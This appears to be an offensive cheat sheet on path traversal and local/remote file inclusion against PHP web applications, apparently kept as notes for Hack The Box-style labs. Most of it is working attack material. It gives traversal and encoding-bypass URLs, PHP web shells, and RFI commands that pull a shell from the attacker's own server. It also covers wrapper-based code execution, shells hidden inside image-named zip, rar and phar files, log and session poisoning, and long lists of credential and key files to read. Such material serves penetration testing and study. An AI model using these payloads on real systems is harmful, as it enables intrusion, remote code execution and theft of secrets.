File path traversal/Local File Inclusion
Last updated
Last updated
Windows:
Linux:
Awesome Wordlist
Function
Read Content
Execute
Remote URL
PHP
include()/include_once()
Yes
Yes
Yes
require()/require_once()
Yes
Yes
No
file_get_contents()
Yes
No
Yes
fopen()/file()
Yes
No
No
NodeJS
fs.readFile()
Yes
No
No
fs.sendFile()
Yes
No
No
res.render()
Yes
Yes
No
Java
include
Yes
No
No
import
Yes
Yes
Yes
.NET
@Html.Partial()
Yes
No
No
@Html.RemotePartial()
Yes
No
Yes
Response.WriteFile()
Yes
No
No
include
Yes
Yes
Yes
#Basic LFI
http://example.com/index.php?page=../../../etc/passwd
#Null Byte
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png
#Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#Path Truncation
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
#Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwdRemote File Inclusion doesn't work anymore on a default configuration since allow_url_include is now disabled since PHP 5.
#Create malicious File
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Intrusionz3r0@htb[/htb]$ echo 'GIF8<?php system($_GET[0]); ?>' > shell.gif
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php #output file
#Set up a server
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server <LISTENING_PORT>
Intrusionz3r0@htb[/htb]$ sudo python -m pyftpdlib -p 21
Intrusionz3r0@htb[/htb]$ impacket-smbserver -smb2support share $(pwd)
#Trigger the RFI through URL
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=\\\\<OUR_IP>\\share\\shell.php&cmd=whoami'
#Read Files and convert them into base64 to bypass restrictions
php://filter/read=convert.base64-encode/resource=<path-filename>
#Remote Code Execution Wrapper
data://text/plain;base64,<base64-string>&cmd=<command>
php://input&cmd=<command>
expect://<command>
#Upload LFI to RCE
#Zip File
Intrusionz3r0@htb[/htb]$ echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
Intrusionz3r0@htb[/htb]$ zip payload.zip payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.zip shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php
zip://./profile_images/shell.jpg%23shell.php&cmd=id
#RAR File
Intrusionz3r0@htb[/htb]$ rar a payload.rar payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.rar shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php
rar://./profile_images/shell.jpg%23shell.php&cmd=id
#PHAR malicious file
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
#Compile file
Intrusionz3r0@htb[/htb]$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id#Fuzzing parameters
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
#Fuzzing LFI paths Windows/Linux
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
#Discover Server Webroot
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
#Server los and configuration (precise scan by using DragonJar wordlist)
Intrusionz3r0@htb[/htb]$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
# Apache Logs
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Nginx Logs
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/usr/local/nginx/logs/access.log
?page=/usr/local/nginx/logs/error.log
# PHP Logs (Common in Apache/Nginx setups)
?page=/var/log/php_errors.log
?page=/etc/php/7.4/fpm/php-fpm.log
?page=/etc/php/8.0/fpm/php-fpm.log
# System Logs (SSH)
?page=/var/log/auth.log
?page=/var/log/secure
?page=/var/log/syslog
?page=/var/log/messages
# Custom Logs (Shared Hosting or Web Servers)
?page=/home/<username>/logs/error_log
?page=/home/<username>/logs/access_log
By default, Apache logs are located in /var/log/apache2/ on Linux and in C:\\xampp\\apache\\logs\\ on Windows, while Nginx logs are located in /var/log/nginx/ on Linux and in C:\\nginx\\log\\ on Windows.
Files in:
access.log
error.log
Payload: http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log
Intrusionz3r0@htb[/htb]$ curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"Most PHP web applications utilize PHPSESSID cookie and these details are stored in session files on the back-end, and saved:
Linux: /var/lib/php/sessions/sess_<PHPSESSID>
Windows: C:\Windows\Temp\sess_<PHPSESSID>
The name of the file that contains our user's data matches the name of our PHPSESSID cookie with the sess_ prefix.
#Poisoning the logs through web php shell
http://<SERVER_IP>:<PORT>/index.php?language=<?php%20system($_GET[0]);%20?>
#Read logs through LFI
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/**sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd**# Home directories
?page=/home/<username>/.bashrc
?page=/home/<username>/.bash_history
?page=/home/<username>/.bash_logout
?page=/home/<username>/.bash_profile
?page=/home/<username>/.profile
?page=/home/<username>/.ssh/id_rsa
# Root directory
?page=/root/.bashrc
?page=/root/.bash_history
?page=/root/.bash_logout
?page=/root/.bash_profile
?pgae=/root/.profile
?page=/root/.ssh/id_rsa
# System-wide configurations
?page=/etc/bash.bashrc
# OS
?page=/etc/lsb-release
?page=/etc/os-release
# Processes
?page=/proc/self/stat
?page=/proc/net/tcp
?page=/proc/self/cmdline
?page=/proc/self/environ
?page=/proc/self/fd/0
?page=/proc/self/fd/1
?page=/proc/<pid>/cmdline
?page=/proc/<pid>/environ
# Mail
?page=/var/mail/<username>
?page=/var/spool/mail/<username>
# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog
# Host
?page=/etc/hosts
?page=/etc/hostname
# Cron
?page=/etc/crontab
# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/html/.htaccess
?page=/var/www/html/.htpasswd
?page=/var/www/example.com/index.php
?page=/var/www/sudomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php
# Apache
?page=/etc/apache2/.htpasswd
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/envvars
?page=/etc/apache2/ports.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Apache Tomcat
?page=/opt/tomcat/conf/tomcat-users.xml
?page=/opt/tomcat/logs/catalina.err
?page=/opt/tomcat/logs/catalina.out
# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/default
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf
# PHP web conf (x.x is specified PHP version)
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini
# Flask
?page=index.html
?page=../__init__.py
?page=../app.py
?page=../db.py
?page=../main.py
?page=/home/<username>/<appname>/app.py
?page=/opt/<appname>/app.py
?page=/srv/<appname>/app.py
# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones
# Windows
?page=C:/Windows/debug/NetSetup.log
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Windows/System32/inetsrv/config/applicationHost.config
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/<project>/web.config
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php
# WordPress Core Files
?page=wp-config.php
?page=.htaccess
?page=.user.ini
?page=wp-includes/version.php
?page=wp-content/themes/twentytwentyone/functions.php
?page=wp-content/themes/twentytwentythree/functions.php
?page=wp-content/plugins/hello.php
?page=wp-content/uploads/.htaccess
?page=wp-content/uploads/custom-image.jpg
# WordPress Database Configurations
?page=/var/www/html/wordpress/wp-config.php
?page=/var/www/wordpress/wp-config.php
?page=/var/www/example.com/wp-config.php
?page=/var/www/sub.example.com/wp-config.php
?page=/var/www/html/wordpress/wp-content/plugins/akismet/akismet.php
?page=/var/www/html/wordpress/wp-content/themes/twentytwenty/functions.php
# Backup Files
?page=/var/backups/wordpress.sql
?page=/var/backups/wordpress.zip
?page=/var/backups/db.sql
?page=/var/backups/wp-content.zip
# Logs and Debugging Files
?page=debug.log
?page=/var/www/html/wordpress/wp-content/debug.log
?page=/var/www/html/wordpress/wp-content/uploads/debug.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
# WordPress JSON REST API
?page=/wp-json/wp/v2/posts
?page=/wp-json/wp/v2/users
?page=/wp-json/wp/v2/pages
?page=/wp-json/wp/v2/media
# XMLRPC Files
?page=/xmlrpc.php
?page=/wp-includes/IXR/class-IXR.php
# Sensitive Directories
?page=/wp-content/
?page=/wp-admin/
?page=/wp-includes/
?page=/wp-content/uploads/
?page=/wp-content/plugins/
?page=/wp-content/themes/
# Plugins Configuration
?page=/wp-content/plugins/woocommerce/includes/class-wc-cart.php
?page=/wp-content/plugins/elementor/includes/plugin.php
?page=/wp-content/plugins/contact-form-7/includes/controller.php
# Themes Configuration
?page=/wp-content/themes/twentytwentyone/style.css
?page=/wp-content/themes/twentytwenty/functions.php
?page=/wp-content/themes/customtheme/style.css
# wp-cli
?page=/usr/local/bin/wp-cli.phar
# Cron Jobs
?page=/wp-cron.php
# System Configurations
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/wordpress.conf
?page=/etc/php/7.4/apache2/php.ini
?page=/etc/php/8.0/apache2/php.ini
# Database Files
?page=/var/lib/mysql/wordpress/wp_users.MYD
?page=/var/lib/mysql/wordpress/wp_posts.MYD
?page=/var/lib/mysql/wordpress/wp_options.MYD
?page=/var/lib/mysql/mysql/user.MYD
